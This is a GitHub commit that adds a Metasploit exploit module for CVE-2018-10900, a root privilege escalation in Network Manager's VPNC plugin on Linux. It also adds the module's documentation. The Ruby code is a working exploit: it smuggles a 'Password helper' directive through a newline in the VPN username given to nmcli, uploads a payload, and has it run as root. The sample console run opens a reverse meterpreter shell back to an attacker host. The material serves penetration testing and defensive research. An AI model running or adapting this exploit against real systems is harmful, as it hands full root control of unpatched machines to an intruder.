Skip to content

Commit

Permalink
Land #10482, Add Network Manager VPNC Privesc
Browse files Browse the repository at this point in the history
  • Loading branch information
@space-r7
space-r7 committed Aug 30, 2018
2 parents ad4266f + f09148d commit 6ec8522
Show file tree
Hide file tree
Showing 2 changed files with 239 additions and 0 deletions.
91 changes: 91 additions & 0 deletions ...mentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,91 @@
## Description

This module exploits an injection vulnerability in the Network Manager
VPNC plugin to gain *root* privileges.

This module uses a new line injection vulnerability in the configured
username for a VPN network connection to inject a `Password helper`
configuration directive into the connection configuration.

The specified helper is executed by Network Manager as root when the
connection is started.

Network Manager VPNC versions prior to 1.2.6 are vulnerable.


## Vulnerable Application

This module has been tested successfully with VPNC versions:

* 1.2.4-4 on Debian 9.0.0 (x64); and
* 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).


## Installation

The following installation instructions are for Ubuntu 16.04.04.

```sh
# List available network-manager-vpnc packages
apt-cache showpkg network-manager-vpnc

# Install a vulnerable package
apt-get install network-manager-vpnc=1.1.93-1
```


## Verification Steps

1. Start `msfconsole`
2. Get a session
3. Do: `use exploit/linux/local/network_manager_vpnc_username_priv_esc`
4. Do: `set SESSION [SESSION]`
5. Do: `run`
6. You should get a new *root* session


## Options

**SESSION**

Which session to use, which can be viewed with `sessions`

**WritableDir**

A writable directory file system path. (default: `/tmp`)


## Scenarios

```
msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[+] nmcli utility is installed
[*] Adding VPN connection...
[*] Uploading payload...
[*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ...
[*] Starting VPN connection...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 172.16.191.201
[+] Deleted /tmp/.4FCA0Pp4tw
[*] Removing VPN connection...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.201
OS : Ubuntu 16.04 (Linux 4.13.0-41-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```

148 changes: 148 additions & 0 deletions modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,148 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Network Manager VPNC Username Privilege Escalation',
'Description' => %q{
This module exploits an injection vulnerability in the Network Manager
VPNC plugin to gain root privileges.
This module uses a new line injection vulnerability in the configured
username for a VPN network connection to inject a `Password helper`
configuration directive into the connection configuration.
The specified helper is executed by Network Manager as root when the
connection is started.
Network Manager VPNC versions prior to 1.2.6 are vulnerable.
This module has been tested successfully with VPNC versions:
1.2.4-4 on Debian 9.0.0 (x64); and
1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Andzakovic', # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Jul 26 2018',
'References' =>
[
['CVE', '2018-10900'],
['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
['URL', 'https://www.debian.org/security/2018/dsa-4253'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end

def base_dir
datastore['WritableDir'].to_s
end

def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end

def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end

def check
unless command_exists? 'nmcli'
vprint_error 'Network Manager nmcli utility is not installed'
return CheckCode::Safe
end
vprint_good 'nmcli utility is installed'

CheckCode::Detected
end

def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

if check != CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end

@payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
payload_path = "#{base_dir}/#{@payload_name}"

print_status 'Adding VPN connection...'
vpn_data = []
vpn_data << '+vpn.data "IKE DH Group = dh2"'
vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
vpn_data << '+vpn.data "IPSec secret-flags = 4"'
vpn_data << '+vpn.data "Local Port = 0"'
vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
vpn_data << '+vpn.data "Vendor = cisco"'
vpn_data << '+vpn.data "Xauth password-flags = 4"'
vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
if res.include? 'Error'
fail_with Failure::Unknown, 'Could not create VPN connection'
end

res = cmd_exec 'nmcli connection'
unless res.include? @payload_name
fail_with Failure::Unknown, 'Could not create VPN connection'
end

print_status 'Uploading payload...'
upload_and_chmodx payload_path, generate_payload_exe

print_status 'Starting VPN connection...'
cmd_exec "nmcli connection up #{@payload_name} & echo "
end

def cleanup
print_status 'Removing VPN connection...'
res = cmd_exec "nmcli connection delete #{@payload_name}"
unless res.include? 'successfully deleted'
print_warning "Could not remove VPN connection #{@payload_name}"
end
super
end
end

0 comments on commit 6ec8522

Please sign in to comment.